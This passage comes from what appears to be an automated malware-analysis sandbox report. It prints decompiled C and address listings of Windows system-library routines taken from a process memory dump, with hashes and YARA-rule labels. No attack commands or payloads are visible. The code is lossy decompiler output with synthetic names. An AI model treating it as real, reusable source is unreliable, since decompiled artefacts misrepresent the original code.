																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0491F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E049A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0492D130(_t427, _t494, _t511);
				}
			}

0x049a5ba5
0x049a5baa
0x049a5baf
0x049a5bb4
0x049a5bb6
0x049a5bbc
0x049a5bbe
0x049a5bc4
0x049a5bcd
0x049a5bd3
0x049a5bd6
0x049a5bdc
0x049a5be0
0x049a5be3
0x049a5beb
0x049a5bf2
0x049a5bf8
0x049a5bfe
0x049a5c04
0x049a5c0e
0x049a5c18
0x049a5c1f
0x049a5c25
0x049a5c2a
0x049a5c2c
0x049a5c32
0x049a5c3a
0x049a5c3f
0x049a5c42
0x049a5c48
0x049a5c5b
0x049a5c5b
0x049a5c2c
0x049a5cb7
0x049a5cb9
0x049a5cbf
0x049a5cc2
0x049a5cca
0x049a5ccb
0x049a5ccb
0x049a5cd1
0x049a5cd7
0x049a5cda
0x049a5ce1
0x049a5ce4
0x049a5ce7
0x049a5ced
0x049a5cf3
0x049a5cf9
0x049a5cff
0x049a5d08
0x049a5d0a
0x049a5d0e
0x049a5d10
0x00000000
0x00000000
0x049a5d16
0x049a5d1a
0x00000000
0x00000000
0x049a5d20
0x049a5d22
0x049a5d25
0x049a5d2f
0x049a5d2f
0x049a5d33
0x049a5d3d
0x049a5d49
0x049a5d4b
0x00000000
0x00000000
0x049a5d5a
0x049a5d5d
0x049a5d60
0x00000000
0x00000000
0x049a5d66
0x049a5d69
0x00000000
0x00000000
0x049a5d6f
0x049a5d6f
0x049a5d73
0x049a5d79
0x049a5d7f
0x049a5d86
0x049a5d95
0x049a5d98
0x049a5dba
0x049a5dcb
0x049a5dce
0x049a5dd3
0x049a5dd6
0x049a5dd8
0x049a5de6
0x049a5dec
0x049a5dee
0x049a5df1
0x049a5df3
0x049a635a
0x049a635a
0x00000000
0x049a635a
0x049a5dfe
0x049a5e02
0x049a5e05
0x049a5e07
0x049a5e10
0x049a5e13
0x049a5e1b
0x049a5e1c
0x049a5e21
0x049a5e22
0x049a5e23
0x049a5e25
0x049a5e2a
0x049a5e2c
0x049a5e2e
0x049a5e36
0x049a5e39
0x049a5e42
0x049a5e47
0x049a5e4d
0x049a5e54
0x049a5e54
0x049a5e54
0x049a5e2e
0x049a5e5c
0x049a5e5f
0x049a5e62
0x049a5e64
0x049a5e6b
0x049a5e70
0x049a5e7a
0x049a5e7a
0x049a5e7a
0x049a5e6b
0x049a5e7e
0x049a5e7f
0x049a5e7f
0x049a5e81
0x049a5e87
0x049a5e8b
0x049a5e8c
0x049a5e8c
0x049a5e8c
0x049a5e9a
0x049a5e9c
0x049a5ea2
0x049a5ea6
0x049a5f50
0x049a5f50
0x049a5f57
0x049a5f66
0x049a5f66
0x049a5f66
0x049a5f68
0x049a5f6a
0x049a63d0
0x00000000
0x049a5f70
0x049a5f70
0x049a5f91
0x049a5f9c
0x049a5f9e
0x049a5fa4
0x049a5fa6
0x049a638c
0x049a6392
0x049a63a1
0x049a63a7
0x049a63af
0x049a63af
0x049a63bd
0x049a63d8
0x00000000
0x049a63d8
0x049a5fac
0x049a5fb2
0x049a5fb4
0x049a5fbd
0x049a5fc6
0x049a5fce
0x049a5fd4
0x049a5fdc
0x049a5fec
0x049a5fed
0x049a5fee
0x049a5fef
0x049a5ff9
0x049a5ffa
0x049a5ffb
0x049a5ffc
0x049a6000
0x049a6004
0x049a6012
0x049a6012
0x049a6018
0x049a6019
0x049a601a
0x049a601b
0x049a601c
0x049a6020
0x049a6059
0x049a605c
0x049a6061
0x049a6061
0x049a6022
0x049a6022
0x049a6022
0x049a6025
0x049a602a
0x049a602b
0x049a6031
0x049a6037
0x049a6038
0x049a603e
0x049a6048
0x049a6049
0x049a604a
0x049a604b
0x049a604c
0x049a604d
0x049a6053
0x049a6054
0x049a6054
0x049a6062
0x049a6065
0x049a6067
0x049a606a
0x049a6070
0x049a6075
0x049a6076
0x049a6081
0x049a6087
0x049a6095
0x049a6099
0x049a609e
0x049a60a4
0x049a60ae
0x049a60b0
0x049a60b3
0x049a60b6
0x049a60b8
0x049a60ba
0x049a60ba
0x049a60ba
0x049a60ba
0x049a60be
0x049a60c0
0x049a60c5
0x049a60c5
0x049a60c5
0x049a60c6
0x049a60cd
0x049a6114
0x049a60cf
0x049a60cf
0x049a60d4
0x049a60d5
0x049a60da
0x049a60db
0x049a60e1
0x049a60e2
0x049a60e8
0x049a60f8
0x049a60fd
0x049a60fe
0x049a6102
0x049a6104
0x049a6107
0x049a6109
0x049a610b
0x049a610b
0x049a610b
0x049a610b
0x049a610f
0x049a610f
0x049a6117
0x049a611a
0x049a611f
0x049a6125
0x049a6134
0x049a6139
0x049a613f
0x049a6146
0x049a6148
0x049a614b
0x049a614d
0x049a614f
0x049a614f
0x049a614f
0x049a614f
0x049a6153
0x049a6159
0x049a6159
0x049a615c
0x049a6163
0x049a6169
0x049a616c
0x049a6172
0x049a6181
0x049a6186
0x049a6187
0x049a618b
0x049a6191
0x049a6195
0x049a61a3
0x049a61bb
0x049a61c0
0x049a61c3
0x049a61cc
0x049a61d0
0x049a61dc
0x049a61de
0x049a61e1
0x049a61e4
0x049a61e6
0x049a61e8
0x049a61e8
0x049a61e8
0x049a61e8
0x049a61e6
0x049a61ec
0x049a61f3
0x049a6203
0x049a6209
0x049a620a
0x049a6216
0x049a621d
0x049a6227
0x049a6241
0x049a6246
0x049a624c
0x049a6257
0x049a6259
0x049a625c
0x049a625e
0x049a6260
0x049a6260
0x049a6260
0x049a6260
0x049a625e
0x049a6264
0x049a6267
0x049a6269
0x049a6315
0x049a6315
0x049a631b
0x049a631e
0x049a6324
0x049a6327
0x049a632f
0x049a6330
0x049a6333
0x049a633a
0x049a633c
0x049a6335
0x049a6335
0x049a6335
0x049a633f
0x049a6342
0x049a634c
0x049a6352
0x049a6355
0x049a6355
0x049a6359
0x00000000
0x049a626f
0x049a6275
0x049a6275
0x049a6278
0x049a627e
0x049a627e
0x049a6281
0x049a6287
0x049a628d
0x049a6298
0x049a629c
0x049a62a2
0x049a629e
0x049a629e
0x049a629e
0x049a62a7
0x049a62a7
0x049a62aa
0x049a62b0
0x049a62f0
0x049a62f0
0x049a62f2
0x049a62f8
0x049a62fd
0x049a62b2
0x049a62b2
0x049a62b2
0x049a62b5
0x049a62dd
0x049a62e2
0x049a62e5
0x049a62b7
0x049a62b8
0x049a62bb
0x049a62bd
0x049a62c0
0x049a62c4
0x049a62cd
0x049a62cd
0x049a62c0
0x049a62bb
0x049a62b5
0x049a6302
0x049a6303
0x049a6305
0x049a6305
0x049a6305
0x049a630c
0x049a630c
0x00000000
0x049a627e
0x049a6269
0x049a5eac
0x049a5ebb
0x049a5ebe
0x049a5ecb
0x049a5ecb
0x049a5ece
0x049a5ece
0x049a5ed4
0x049a5ed7
0x049a5ed9
0x049a5edb
0x049a5edb
0x049a5ee1
0x049a5ee1
0x049a5ee3
0x049a5f20
0x049a5f20
0x049a5ee5
0x049a5ee5
0x049a5ee5
0x049a5ee8
0x049a5f11
0x049a5f18
0x049a5eea
0x049a5eea
0x049a5eed
0x049a5ef2
0x049a5ef8
0x049a5efb
0x049a5f0a
0x049a5f0a
0x049a5eed
0x049a5ee8
0x049a5f22
0x049a5f28
0x00000000
0x00000000
0x049a5f30
0x049a5f31
0x049a5f37
0x049a5f3a
0x049a5f3d
0x049a5f44
0x00000000
0x00000000
0x00000000
0x049a5f46
0x049a5f48
0x049a5f4d
0x00000000
0x049a5f4d
0x049a5dda
0x049a5ddf
0x00000000
0x049a5ddf
0x049a5dd8
0x049a5da7
0x049a5da9
0x049a5dac
0x049a5dae
0x00000000
0x049a5db4
0x049a5db4
0x00000000
0x049a5db4
0x049a5dae
0x049a5d88
0x049a5d8d
0x049a6363
0x049a6369
0x049a636a
0x049a6370
0x049a6372
0x049a637a
0x049a637b
0x049a637d
0x00000000
0x00000000
0x049a637f
0x049a6385
0x00000000
0x049a6385
0x049a5d38
0x049a5d3b
0x00000000
0x00000000
0x00000000
0x049a5d3b
0x049a5d27
0x049a5d29
0x00000000
0x00000000
0x00000000
0x049a6360
0x00000000
0x049a6360
0x049a5c10
0x049a5c10
0x049a63da
0x049a63e5
0x049a63e5

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb79a57d4d96196c3310e55294e895791974667f49c0967156eb9711d65dc4d
Instruction ID: aa8011c0f084b09bb4c147133f16a5282de972a30aa4031177e705a3b99a9742
Opcode Fuzzy Hash: bdb79a57d4d96196c3310e55294e895791974667f49c0967156eb9711d65dc4d
Instruction Fuzzy Hash: AB427F75A00229DFDB24CF68C880BA9B7B5FF45314F1581AAD84DEB242E734AD95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 048F4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E048F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x49cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0490F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E048F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L048F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E048F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M048F45F8))) {
												case 0:
													_v568 = 0x48b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x48b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L048F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0491F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0491F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E048D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E048EEB70(1, 0x49c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E048EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E049195D0();
																			L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0491B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04913D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0491B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x048f4128
0x048f4135
0x048f413c
0x048f4141
0x048f4145
0x048f4147
0x048f414e
0x048f4151
0x048f4159
0x048f415c
0x048f4160
0x048f4164
0x048f4168
0x048f416c
0x048f417f
0x048f4181
0x048f446a
0x048f446a
0x048f418c
0x048f4195
0x048f4199
0x048f4432
0x048f4439
0x048f443d
0x048f4442
0x048f4447
0x00000000
0x048f419f
0x048f41a3
0x048f41b1
0x048f41b9
0x048f41bd
0x048f45db
0x048f45db
0x00000000
0x048f41c3
0x048f41c3
0x048f41ce
0x048f41d4
0x0493e138
0x0493e13e
0x0493e169
0x0493e16d
0x0493e19e
0x0493e16f
0x0493e16f
0x0493e175
0x0493e179
0x0493e18f
0x0493e193
0x00000000
0x0493e199
0x00000000
0x0493e199
0x0493e193
0x00000000
0x00000000
0x00000000
0x048f41da
0x048f41da
0x048f41df
0x048f41e4
0x048f41ec
0x048f4203
0x048f4207
0x0493e1fd
0x048f4222
0x048f4226
0x0493e1f3
0x0493e1f3
0x048f422c
0x048f422c
0x048f4233
0x0493e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x048f4239
0x048f4239
0x048f4239
0x048f4239
0x048f4233
0x048f4226
0x048f41ee
0x048f41ee
0x048f41f4
0x048f4575
0x0493e1b1
0x0493e1b1
0x00000000
0x048f457b
0x048f457b
0x048f4582
0x0493e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x048f4588
0x048f4588
0x048f458c
0x0493e1c4
0x0493e1c4
0x00000000
0x048f4592
0x048f4592
0x048f4599
0x0493e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x048f459f
0x048f459f
0x048f45a3
0x0493e1d7
0x0493e1e4
0x00000000
0x048f45a9
0x048f45a9
0x048f45b0
0x0493e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x048f45b6
0x048f45b6
0x048f45b6
0x00000000
0x048f45b6
0x048f45b0
0x048f45a3
0x048f4599
0x048f458c
0x048f4582
0x00000000
0x00000000
0x00000000
0x00000000
0x048f41f4
0x048f423e
0x048f4241
0x048f45c0
0x048f45c4
0x00000000
0x048f45ca
0x048f45ca
0x00000000
0x0493e207
0x0493e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x048f45d1
0x00000000
0x00000000
0x048f45ca
0x00000000
0x048f4247
0x048f4247
0x048f4247
0x048f4249
0x048f4249
0x048f4249
0x048f4251
0x048f4251
0x048f4257
0x048f425f
0x048f426e
0x048f4270
0x048f427a
0x0493e219
0x0493e219
0x048f4280
0x048f4282
0x048f4456
0x048f45ea
0x00000000
0x048f45f0
0x0493e223
0x00000000
0x0493e223
0x048f445c
0x048f445c
0x00000000
0x048f445c
0x00000000
0x048f4288
0x048f428c
0x0493e298
0x048f4292
0x048f4292
0x048f429e
0x048f42a3
0x048f42a7
0x048f42ac
0x0493e22d
0x048f42b2
0x048f42b2
0x048f42b9
0x048f42bc
0x048f42c2
0x048f42ca
0x048f42cd
0x048f42cd
0x048f42d4
0x048f433f
0x048f433f
0x048f42d6
0x048f42d6
0x048f42d9
0x048f42dd
0x048f42eb
0x0493e23a
0x048f42f1
0x048f4305
0x048f430d
0x048f4315
0x048f4318
0x048f431f
0x048f4322
0x048f432e
0x048f433b
0x048f433b
0x00000000
0x048f432e
0x048f42eb
0x048f434c
0x048f434e
0x048f4352
0x048f4359
0x048f435e
0x048f4361
0x048f436e
0x048f438a
0x048f438e
0x048f4396
0x048f439e
0x048f43a1
0x048f43ad
0x048f43bb
0x048f43bb
0x048f43ad
0x048f436e
0x048f43bf
0x048f43c5
0x048f4463
0x048f4463
0x048f43ce
0x048f43d5
0x048f43d9
0x048f43df
0x048f4475
0x048f4479
0x048f4491
0x048f4491
0x048f4479
0x048f43e5
0x048f43eb
0x048f43f4
0x048f43f6
0x048f43f9
0x048f43fc
0x048f43ff
0x048f44e8
0x048f44ed
0x048f44f3
0x0493e247
0x00000000
0x048f44f9
0x048f4504
0x048f4508
0x048f450f
0x0493e269
0x00000000
0x048f4515
0x048f4519
0x048f4531
0x048f4534
0x048f4537
0x048f453e
0x048f4541
0x048f454a
0x0493e255
0x0493e255
0x0493e25b
0x0493e25e
0x0493e261
0x0493e261
0x048f4555
0x048f4559
0x048f455d
0x0493e26d
0x0493e270
0x0493e274
0x0493e27a
0x0493e27d
0x0493e28e
0x0493e28e
0x048f4563
0x048f4563
0x048f4569
0x048f4569
0x00000000
0x048f455d
0x048f450f
0x00000000
0x048f44f3
0x048f43ff
0x048f4405
0x048f4405
0x048f4405
0x048f42ac
0x048f428c
0x048f4282
0x048f4407
0x048f440d
0x0493e2af
0x0493e2af
0x048f4413
0x048f4413
0x00000000
0x048f41d4
0x00000000
0x048f41c3
0x048f41bd
0x048f4415
0x048f4415
0x048f4416
0x048f4417
0x048f4429
0x048f416e
0x048f416e
0x048f4175
0x048f4498
0x048f449f
0x0493e12d
0x00000000
0x0493e133
0x00000000
0x0493e133
0x048f44a5
0x048f44a5
0x048f44aa
0x00000000
0x048f44bb
0x048f44ca
0x048f44d6
0x048f44d7
0x048f44d8
0x048f44e3
0x048f44e3
0x048f44aa
0x048f417b
0x048f417b
0x048f417b
0x00000000
0x048f417b
0x048f4175
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c39f3e54ed51107019804d35f51a211ad6d001c11f72cdc802470fdc21cd909f
Instruction ID: 3a00cd9ef8cd5f2a12d17b16c3f9de58916f5b1bc61ad04ff4de34e3fa1bc408
Opcode Fuzzy Hash: c39f3e54ed51107019804d35f51a211ad6d001c11f72cdc802470fdc21cd909f
Instruction Fuzzy Hash: 95F171706082118BDB24CF59C880A3BB7E1FFA9B58F144E2EF596C7250E734E985DB52

Uniqueness

Uniqueness Score: -1.00%

Function 049020A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E049020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
